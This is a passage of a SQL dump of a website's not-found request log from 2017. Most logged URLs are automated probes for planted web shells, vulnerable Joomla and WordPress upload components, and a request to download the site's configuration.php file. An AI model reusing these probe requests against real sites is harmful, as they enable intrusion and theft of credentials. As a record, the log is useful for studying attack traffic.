00:00:00'),(11833,'http://hallcrestheights.org/manager/popup-pomo.php',NULL,'http://hallcrestheights.org/manager/popup-pomo.php','',8,0,'2017-08-27 17:02:58','0000-00-00 00:00:00'),(11834,'http://hallcrestheights.org/menusa/popup-pomo.php',NULL,'http://hallcrestheights.org/menusa/popup-pomo.php','',9,0,'2017-08-27 17:23:32','0000-00-00 00:00:00'),(11835,'http://hallcrestheights.org/modules/mod_footer/tmpl/mark.php',NULL,'http://hallcrestheights.org/modules/mod_footer/tmpl/mark.php','',5,0,'2017-08-27 17:27:24','0000-00-00 00:00:00'),(11836,'http://hallcrestheights.org/fascina/popup-pomo.php',NULL,'http://hallcrestheights.org/fascina/popup-pomo.php','',12,0,'2017-08-27 17:51:15','0000-00-00 00:00:00'),(11837,'http://hallcrestheights.org/canadapost/popup-pomo.php',NULL,'http://hallcrestheights.org/canadapost/popup-pomo.php','',7,0,'2017-08-27 17:50:37','0000-00-00 00:00:00'),(11838,'http://hallcrestheights.org/parseopml/popup-pomo.php',NULL,'http://hallcrestheights.org/parseopml/popup-pomo.php','',14,0,'2017-08-27 18:15:47','0000-00-00 00:00:00'),(11839,'http://hallcrestheights.org/components/com_content/views/category/.message.php',NULL,'http://hallcrestheights.org/components/com_content/views/category/.message.php','',9,0,'2017-08-27 18:41:37','0000-00-00 00:00:00'),(11840,'http://hallcrestheights.org/iadvize/popup-pomo.php',NULL,'http://hallcrestheights.org/iadvize/popup-pomo.php','',9,0,'2017-08-27 18:44:30','0000-00-00 00:00:00'),(11841,'http://hallcrestheights.org/paypal/popup-pomo.php',NULL,'http://hallcrestheights.org/paypal/popup-pomo.php','',12,0,'2017-08-27 19:10:39','0000-00-00 00:00:00'),(11842,'http://hallcrestheights.org/scripts/popup-pomo.php',NULL,'http://hallcrestheights.org/scripts/popup-pomo.php','',11,0,'2017-08-27 19:18:42','0000-00-00 00:00:00'),(11843,'http://hallcrestheights.org/libraries/phpmailer/language/mark.php',NULL,'http://hallcrestheights.org/libraries/phpmailer/language/mark.php','',6,0,'2017-08-27 20:36:45','0000-00-00 00:00:00'),(11844,'http://hallcrestheights.org/themesa/popup-pomo.php',NULL,'http://hallcrestheights.org/themesa/popup-pomo.php','',5,0,'2017-08-27 20:52:05','0000-00-00 00:00:00'),(11845,'http://hallcrestheights.org/phpmaila/popup-pomo.php',NULL,'http://hallcrestheights.org/phpmaila/popup-pomo.php','',3,0,'2017-08-27 20:56:05','0000-00-00 00:00:00'),(11846,'http://hallcrestheights.org/wp-includes/requests/utility/.path.php',NULL,'http://hallcrestheights.org/wp-includes/requests/utility/.path.php','',1,0,'2017-08-27 21:18:26','0000-00-00 00:00:00'),(11847,'http://hallcrestheights.org/menus/popup-pomo.php',NULL,'http://hallcrestheights.org/menus/popup-pomo.php','',11,0,'2017-08-27 21:21:48','0000-00-00 00:00:00'),(11848,'http://hallcrestheights.org/stylesa/popup-pomo.php',NULL,'http://hallcrestheights.org/stylesa/popup-pomo.php','',9,0,'2017-08-27 22:34:39','0000-00-00 00:00:00'),(11849,'http://hallcrestheights.org/managera/popup-pomo.php',NULL,'http://hallcrestheights.org/managera/popup-pomo.php','',8,0,'2017-08-27 22:39:05','0000-00-00 00:00:00'),(11850,'http://hallcrestheights.org/entful/popup-pomo.php',NULL,'http://hallcrestheights.org/entful/popup-pomo.php','',7,0,'2017-08-27 23:08:42','0000-00-00 00:00:00'),(11851,'http://hallcrestheights.org/term/popup-pomo.php',NULL,'http://hallcrestheights.org/term/popup-pomo.php','',12,0,'2017-08-27 23:21:23','0000-00-00 00:00:00'),(11852,'http://hallcrestheights.org/statslive/popup-pomo.php',NULL,'http://hallcrestheights.org/statslive/popup-pomo.php','',4,0,'2017-08-27 23:55:03','0000-00-00 00:00:00'),(11853,'http://hallcrestheights.org/ekomi/popup-pomo.php',NULL,'http://hallcrestheights.org/ekomi/popup-pomo.php','',10,0,'2017-08-28 00:12:42','0000-00-00 00:00:00'),(11854,'http://hallcrestheights.org/pressthisa/popup-pomo.php',NULL,'http://hallcrestheights.org/pressthisa/popup-pomo.php','',15,0,'2017-08-28 00:15:37','0000-00-00 00:00:00'),(11855,'http://hallcrestheights.org/widgets/popup-pomo.php',NULL,'http://hallcrestheights.org/widgets/popup-pomo.php','',8,0,'2017-08-28 00:15:14','0000-00-00 00:00:00'),(11856,'http://hallcrestheights.org/profilea/popup-pomo.php',NULL,'http://hallcrestheights.org/profilea/popup-pomo.php','',6,0,'2017-08-28 00:18:26','0000-00-00 00:00:00'),(11857,'http://hallcrestheights.org/permalink/popup-pomo.php',NULL,'http://hallcrestheights.org/permalink/popup-pomo.php','',11,0,'2017-08-28 00:19:11','0000-00-00 00:00:00'),(11858,'http://hallcrestheights.org/components/com_search/models/popup-pomo.php',NULL,'http://hallcrestheights.org/components/com_search/models/popup-pomo.php','',5,0,'2017-08-28 00:21:59','0000-00-00 00:00:00'),(11859,'http://hallcrestheights.org/discussion/popup-pomo.php',NULL,'http://hallcrestheights.org/discussion/popup-pomo.php','',13,0,'2017-08-28 00:24:14','0000-00-00 00:00:00'),(11860,'http://hallcrestheights.org/setupconfig/popup-pomo.php',NULL,'http://hallcrestheights.org/setupconfig/popup-pomo.php','',17,0,'2017-08-28 00:46:47','0000-00-00 00:00:00'),(11861,'http://hallcrestheights.org/gcheckout/popup-pomo.php',NULL,'http://hallcrestheights.org/gcheckout/popup-pomo.php','',5,0,'2017-08-28 01:11:23','0000-00-00 00:00:00'),(11862,'http://hallcrestheights.org/wp-includes/pomo/.dbmsc.php',NULL,'http://hallcrestheights.org/wp-includes/pomo/.dbmsc.php','',1,0,'2017-08-28 02:22:09','0000-00-00 00:00:00'),(11863,'http://hallcrestheights.org/network/popup-pomo.php',NULL,'http://hallcrestheights.org/network/popup-pomo.php','',15,0,'2017-08-28 02:40:39','0000-00-00 00:00:00'),(11864,'http://hallcrestheights.org/options/popup-pomo.php',NULL,'http://hallcrestheights.org/options/popup-pomo.php','',8,0,'2017-08-28 03:16:34','0000-00-00 00:00:00'),(11865,'http://hallcrestheights.org/optionsa/popup-pomo.php',NULL,'http://hallcrestheights.org/optionsa/popup-pomo.php','',8,0,'2017-08-28 04:25:02','0000-00-00 00:00:00'),(11866,'http://hallcrestheights.org/permalinka/popup-pomo.php',NULL,'http://hallcrestheights.org/permalinka/popup-pomo.php','',11,0,'2017-08-28 04:29:04','0000-00-00 00:00:00'),(11867,'http://hallcrestheights.org/feeder/popup-pomo.php',NULL,'http://hallcrestheights.org/feeder/popup-pomo.php','',5,0,'2017-08-28 04:50:28','0000-00-00 00:00:00'),(11868,'http://hallcrestheights.org/components/com_search/models/mark.php',NULL,'http://hallcrestheights.org/components/com_search/models/mark.php','',4,0,'2017-08-28 07:26:51','0000-00-00 00:00:00'),(11869,'http://hallcrestheights.org/components/com_chronoforms/views/data.php',NULL,'','',2,0,'2017-08-28 10:33:39','0000-00-00 00:00:00'),(11870,'http://hallcrestheights.org/association/wp-login.php',NULL,'','',6,0,'2017-08-30 13:17:22','0000-00-00 00:00:00'),(11871,'http://hallcrestheights.org/components/com_foxcontact/lib/file-uploader.php',NULL,'hallcrestheights.org','',9,0,'2017-08-30 16:24:18','0000-00-00 00:00:00'),(11872,'http://hallcrestheights.org/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',2,0,'2017-08-31 07:01:23','0000-00-00 00:00:00'),(11873,'http://hallcrestheights.org/updatecorea/popup-pomo.php',NULL,'http://hallcrestheights.org/updatecorea/popup-pomo.php','',7,0,'2017-09-04 17:05:22','0000-00-00 00:00:00'),(11874,'http://hallcrestheights.org/gadsense/popup-pomo.php',NULL,'http://hallcrestheights.org/gadsense/popup-pomo.php','',3,0,'2017-09-04 18:14:36','0000-00-00 00:00:00'),(11875,'http://hallcrestheights.org/terma/popup-pomo.php',NULL,'http://hallcrestheights.org/terma/popup-pomo.php','',7,0,'2017-09-04 18:23:29','0000-00-00 00:00:00'),(11876,'http://hallcrestheights.org/pressthis/popup-pomo.php',NULL,'http://hallcrestheights.org/pressthis/popup-pomo.php','',11,0,'2017-09-04 18:43:35','0000-00-00 00:00:00'),(11877,'http://hallcrestheights.org/postnew/popup-pomo.php',NULL,'http://hallcrestheights.org/postnew/popup-pomo.php','',8,0,'2017-09-04 19:19:41','0000-00-00 00:00:00'),(11878,'http://hallcrestheights.org/components/com_contact/contact.lib.php',NULL,'http://hallcrestheights.org/components/com_contact/contact.lib.php','',4,0,'2017-09-04 20:01:04','0000-00-00 00:00:00'),(11879,'http://hallcrestheights.org/libraries/joomla/template/mark.php',NULL,'http://hallcrestheights.org/libraries/joomla/template/mark.php','',23,0,'2017-09-04 20:50:37','0000-00-00 00:00:00'),(11880,'http://hallcrestheights.org/language/zh-cn/403.php',NULL,'http://hallcrestheights.org/language/zh-cn/403.php','',1,0,'2017-09-04 21:19:29','0000-00-00 00:00:00'),(11881,'http://hallcrestheights.org/toolsa/popup-pomo.php',NULL,'http://hallcrestheights.org/toolsa/popup-pomo.php','',6,0,'2017-09-04 21:50:15','0000-00-00 00:00:00'),(11882,'http://hallcrestheights.org/wp-content/upgrade/theme-compat/popup-pomo.php',NULL,'http://hallcrestheights.org/wp-content/upgrade/theme-compat/popup-pomo.php','',22,0,'2017-09-04 22:09:27','0000-00-00 00:00:00'),(11883,'http://hallcrestheights.org/hipay/popup-pomo.php',NULL,'http://hallcrestheights.org/hipay/popup-pomo.php','',1,0,'2017-09-04 22:11:43','0000-00-00 00:00:00'),(11884,'http://hallcrestheights.org/mondialrelay/popup-pomo.php',NULL,'http://hallcrestheights.org/mondialrelay/popup-pomo.php','',5,0,'2017-09-04 23:00:42','0000-00-00 00:00:00'),(11885,'http://hallcrestheights.org/wp-config.lib.php',NULL,'http://hallcrestheights.org/wp-config.lib.php','',1,0,'2017-09-04 23:00:50','0000-00-00 00:00:00'),(11886,'http://hallcrestheights.org/wp-content/plugins/editor-extender/.submenu.php',NULL,'http://hallcrestheights.org/wp-content/plugins/editor-extender/.submenu.php','',1,0,'2017-09-04 23:01:34','0000-00-00 00:00:00'),(11887,'http://hallcrestheights.org/networksa/popup-pomo.php',NULL,'http://hallcrestheights.org/networksa/popup-pomo.php','',6,0,'2017-09-05 00:19:59','0000-00-00 00:00:00'),(11888,'http://hallcrestheights.org/setupconfiga/popup-pomo.php',NULL,'http://hallcrestheights.org/setupconfiga/popup-pomo.php','',9,0,'2017-09-05 00:42:19','0000-00-00 00:00:00'),(11889,'http://hallcrestheights.org/profile/popup-pomo.php',NULL,'http://hallcrestheights.org/profile/popup-pomo.php','',12,0,'2017-09-05 00:43:07','0000-00-00 00:00:00'),(11890,'http://hallcrestheights.org/ogone/popup-pomo.php',NULL,'http://hallcrestheights.org/ogone/popup-pomo.php','',8,0,'2017-09-05 01:03:46','0000-00-00 00:00:00'),(11891,'http://hallcrestheights.org/parseopmla/popup-pomo.php',NULL,'http://hallcrestheights.org/parseopmla/popup-pomo.php','',9,0,'2017-09-05 01:12:44','0000-00-00 00:00:00'),(11892,'http://hallcrestheights.org/general/popup-pomo.php',NULL,'http://hallcrestheights.org/general/popup-pomo.php','',13,0,'2017-09-05 01:56:29','0000-00-00 00:00:00'),(11893,'http://hallcrestheights.org/postnewa/popup-pomo.php',NULL,'http://hallcrestheights.org/postnewa/popup-pomo.php','',3,0,'2017-09-05 02:35:41','0000-00-00 00:00:00'),(11894,'http://hallcrestheights.org/components/com_wrapper/model.php',NULL,'http://hallcrestheights.org/components/com_wrapper/model.php','',5,0,'2017-09-05 03:40:16','0000-00-00 00:00:00'),(11895,'http://hallcrestheights.org/barabaschool.ru/scriptsa/popup-pomo.php',NULL,'http://hallcrestheights.org/barabaschool.ru/scriptsa/popup-pomo.php','',1,0,'2017-09-05 04:11:22','0000-00-00 00:00:00'),(11896,'http://hallcrestheights.org/followup/popup-pomo.php',NULL,'http://hallcrestheights.org/followup/popup-pomo.php','',7,0,'2017-09-05 04:59:20','0000-00-00 00:00:00'),(11897,'http://hallcrestheights.org/networka/popup-pomo.php',NULL,'http://hallcrestheights.org/networka/popup-pomo.php','',12,0,'2017-09-05 05:03:58','0000-00-00 00:00:00'),(11898,'http://hallcrestheights.org/wp-blog-mail.php',NULL,'http://hallcrestheights.org/wp-blog-mail.php','',1,0,'2017-09-05 05:26:56','0000-00-00 00:00:00'),(11899,'http://hallcrestheights.org/revisiona/popup-pomo.php',NULL,'http://hallcrestheights.org/revisiona/popup-pomo.php','',12,0,'2017-09-05 06:38:18','0000-00-00 00:00:00'),(11900,'http://hallcrestheights.org/wp-temporary.php',NULL,'hallcrestheights.org','',2,0,'2017-09-05 06:37:43','0000-00-00 00:00:00'),(11901,'http://hallcrestheights.org/scriptsa/popup-pomo.php',NULL,'http://hallcrestheights.org/scriptsa/popup-pomo.php','',6,0,'2017-09-05 06:52:26','0000-00-00 00:00:00'),(11902,'http://hallcrestheights.org/components/com_xmap/views/html/class-library.php',NULL,'http://hallcrestheights.org/components/com_xmap/views/html/class-library.php','',1,0,'2017-09-05 07:02:19','0000-00-00 00:00:00'),(11903,'http://hallcrestheights.org/revision/popup-pomo.php',NULL,'http://hallcrestheights.org/revision/popup-pomo.php','',15,0,'2017-09-05 09:13:58','0000-00-00 00:00:00'),(11904,'http://hallcrestheights.org/news_parser.class.php',NULL,'hallcrestheights.org','',1,0,'2017-09-05 10:06:04','0000-00-00 00:00:00'),(11905,'http://hallcrestheights.org/robots.php?blog_id=1',NULL,'hallcrestheights.org','',1,0,'2017-09-05 10:07:49','0000-00-00 00:00:00'),(11906,'http://hallcrestheights.org/cache.php?blog_id=1',NULL,'hallcrestheights.org','',1,0,'2017-09-05 10:09:07','0000-00-00 00:00:00'),(11907,'http://hallcrestheights.org/xmlrppc.php',NULL,'hallcrestheights.org','',1,0,'2017-09-05 10:17:30','0000-00-00 00:00:00'),(11908,'http://hallcrestheights.org//admin',NULL,'','',3,0,'2017-09-05 15:08:56','0000-00-00 00:00:00'),(11909,'http://hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload',NULL,'','',2,0,'2017-09-05 15:08:58','0000-00-00 00:00:00'),(11910,'http://hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw',NULL,'','',2,0,'2017-09-05 15:08:59','0000-00-00 00:00:00'),(11911,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',3,0,'2017-09-05 15:09:09','0000-00-00 00:00:00'),(11912,'http://hallcrestheights.org//x.htm',NULL,'','',1,0,'2017-09-09 13:52:12','0000-00-00 00:00:00'),(11913,'http://www.hallcrestheights.org/i20162628-nfrkop-dobbumgo-lzes-rkwtz-qtqb-k58649-svjcwjb/',NULL,'','',1,0,'2017-09-10 18:00:42','0000-00-00 00:00:00'),(11914,'http://hallcrestheights.org/ldp.php',NULL,'hallcrestheights.org','',1,0,'2017-09-12 10:38:35','0000-00-00 00:00:00'),(11915,'http://hallcrestheights.org/images/1ndex.php?z3=amVORkZNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:20:58','0000-00-00 00:00:00'),(11916,'http://hallcrestheights.org/configbak.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:23:17','0000-00-00 00:00:00'),(11917,'http://hallcrestheights.org/images/defau1t.php?z3=amVORkZNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:23:39','0000-00-00 00:00:00'),(11918,'http://hallcrestheights.org/cache/cachee.php?z3=amVORkZNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:23:41','0000-00-00 00:00:00'),(11919,'http://hallcrestheights.org/robots.txt.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:32:22','0000-00-00 00:00:00'),(11920,'http://hallcrestheights.org/jconfig.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:35:21','0000-00-00 00:00:00'),(11921,'http://hallcrestheights.org/thumb.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:35:56','0000-00-00 00:00:00'),(11922,'http://hallcrestheights.org/wsdl.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:38:31','0000-00-00 00:00:00'),(11923,'http://hallcrestheights.org/wp-data.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:38:33','0000-00-00 00:00:00'),(11924,'http://hallcrestheights.org/media/tmp.php?z3=amVORkZNLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:40:43','0000-00-00 00:00:00'),(11925,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:39:29','0000-00-00 00:00:00'),(11926,'http://hallcrestheights.org/google-assist.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:40:51','0000-00-00 00:00:00'),(11927,'http://hallcrestheights.org/images/google-assist.php?z3=amVORkZNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:41:13','0000-00-00 00:00:00'),(11928,'http://hallcrestheights.org/elements.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:39:54','0000-00-00 00:00:00'),(11929,'http://hallcrestheights.org/cache/defau1t.php?z3=amVORkZNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:41:18','0000-00-00 00:00:00'),(11930,'http://hallcrestheights.org/roubt.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:41:20','0000-00-00 00:00:00'),(11931,'http://hallcrestheights.org/bookmark.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:41:22','0000-00-00 00:00:00'),(11932,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:42:35','0000-00-00 00:00:00'),(11933,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:41:16','0000-00-00 00:00:00'),(11934,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=amVORkZNLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:43:34','0000-00-00 00:00:00'),(11935,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:44:24','0000-00-00 00:00:00'),(11936,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:44:25','0000-00-00 00:00:00'),(11937,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:44:27','0000-00-00 00:00:00'),(11938,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:46:58','0000-00-00 00:00:00'),(11939,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:47:01','0000-00-00 00:00:00'),(11940,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:45:42','0000-00-00 00:00:00'),(11941,'http://hallcrestheights.org/xmlsrpc.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:50:51','0000-00-00 00:00:00'),(11942,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:50:53','0000-00-00 00:00:00'),(11943,'http://hallcrestheights.org/shootmei.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:52:17','0000-00-00 00:00:00'),(11944,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:54:28','0000-00-00 00:00:00'),(11945,'http://hallcrestheights.org/shootme.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:57:05','0000-00-00 00:00:00'),(11946,'http://hallcrestheights.org/cache/support.php?z3=amVORkZNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 19:58:55','0000-00-00 00:00:00'),(11947,'http://hallcrestheights.org/authenticating.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:59:03','0000-00-00 00:00:00'),(11948,'http://hallcrestheights.org/show.php?z3=amVORkZNLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 19:59:07','0000-00-00 00:00:00'),(11949,'http://hallcrestheights.org/cache/news.php?z3=amVORkZNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-12 20:00:29','0000-00-00 00:00:00'),(11950,'http://hallcrestheights.org/images/head.php?z3=amVORkZNLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 20:00:31','0000-00-00 00:00:00'),(11951,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 20:00:34','0000-00-00 00:00:00'),(11952,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 20:00:36','0000-00-00 00:00:00'),(11953,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=amVORkZNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-12 20:02:27','0000-00-00 00:00:00'),(11954,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/jeNFFM.php',NULL,'','',1,0,'2017-09-12 20:02:04','0000-00-00 00:00:00'),(11955,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/jeNFFM.php',NULL,'','',1,0,'2017-09-12 20:03:26','0000-00-00 00:00:00'),(11956,'http://hallcrestheights.org/wp-content/uploads/jeNFFM.php',NULL,'','',1,0,'2017-09-12 20:02:09','0000-00-00 00:00:00'),(11957,'http://hallcrestheights.org/jeNFFM.php',NULL,'','',1,0,'2017-09-12 20:03:32','0000-00-00 00:00:00'),(11958,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/jeNFFM.php',NULL,'','',1,0,'2017-09-12 20:03:34','0000-00-00 00:00:00'),(11959,'http://hallcrestheights.org/cache/list.php?z3=amVORkZNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 20:03:54','0000-00-00 00:00:00'),(11960,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=amVORkZNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-09-12 20:05:31','0000-00-00 00:00:00'),(11961,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=amVORkZNLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-12 20:13:28','0000-00-00 00:00:00'),(11962,'http://hallcrestheights.org//index.php/contacto?view=foxcontact',NULL,'','',1,0,'2017-09-16 14:54:45','0000-00-00 00:00:00'),(11963,'http://hallcrestheights.org/plugins/system/cache/system.php',NULL,'hallcrestheights.org','',1,0,'2017-09-19 07:07:21','0000-00-00 00:00:00'),(11964,'http://hallcrestheights.org/images/stories/MOguestbook.php',NULL,'hallcrestheights.org','',1,0,'2017-09-19 07:22:38','0000-00-00 00:00:00'),(11965,'http://hallcrestheights.org/versions.php',NULL,'hallcrestheights.org','',1,0,'2017-09-19 16:33:58','0000-00-00 00:00:00'),(11966,'http://www.hallcrestheights.org/k50020-dvisciwb-i20162631-vwkux-krbzomsm-vuclzup-hvqa.htm',NULL,'http://www.hallcrestheights.org/k50020-dvisciwb-i20162631-vwkux-krbzomsm-vuclzup-hvqa.htm','',2,0,'2017-09-20 12:13:04','0000-00-00 00:00:00'),(11967,'http://hallcrestheights.org/modules/mod_menu/confirm.php',NULL,'hallcrestheights.org','',1,0,'2017-09-20 13:34:46','0000-00-00 00:00:00'),(11968,'http://hallcrestheights.org/components/com_banners/banners.html.php',NULL,'hallcrestheights.org','',1,0,'2017-09-20 13:40:16','0000-00-00 00:00:00'),(11969,'http://hallcrestheights.org/libraries/joomla/access/strangers.php',NULL,'hallcrestheights.org','',3,0,'2017-09-20 13:58:31','0000-00-00 00:00:00'),(11970,'http://hallcrestheights.org/modules/mod_footer/tmpl/helper.php',NULL,'hallcrestheights.org','',1,0,'2017-09-20 15:36:55','0000-00-00 00:00:00'),(11971,'http://hallcrestheights.org/libraries/joomla/access/log.php',NULL,'hallcrestheights.org','',1,0,'2017-09-20 15:54:41','0000-00-00 00:00:00'),(11972,'http://hallcrestheights.org//sql-bak.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:01:47','0000-00-00 00:00:00'),(11973,'http://hallcrestheights.org//email.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:00:30','0000-00-00 00:00:00'),(11974,'http://hallcrestheights.org//functions.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:01:59','0000-00-00 00:00:00'),(11975,'http://hallcrestheights.org//cache/cachee.php?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:00:45','0000-00-00 00:00:00'),(11976,'http://hallcrestheights.org//wp-admin/includes/rnnvhs.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWFkbWluL2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:02:14','0000-00-00 00:00:00'),(11977,'http://hallcrestheights.org//languages/rnnvhs.php?z3=NGtmT1ZCLnBocA==&z4=L2xhbmd1YWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:00:59','0000-00-00 00:00:00'),(11978,'http://hallcrestheights.org//images/rnnvhs.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:02:26','0000-00-00 00:00:00'),(11979,'http://hallcrestheights.org//wp-admin/network/rnnvhs.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',3,0,'2017-09-21 05:02:32','0000-00-00 00:00:00'),(11980,'http://hallcrestheights.org//language/en-GB/rnnvhs.php?z3=NGtmT1ZCLnBocA==&z4=L2xhbmd1YWdlL2VuLUdCLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:01:18','0000-00-00 00:00:00'),(11981,'http://hallcrestheights.org//cache/news.php?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:01:31','0000-00-00 00:00:00'),(11982,'http://hallcrestheights.org//tmp.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-09-21 05:02:58','0000-00-00 00:00:00'),(11983,'http://hallcrestheights.org//shootme.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-09-21 05:03:05','0000-00-00 00:00:00'),(11984,'http://hallcrestheights.org//configurationbak.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:03:11','0000-00-00 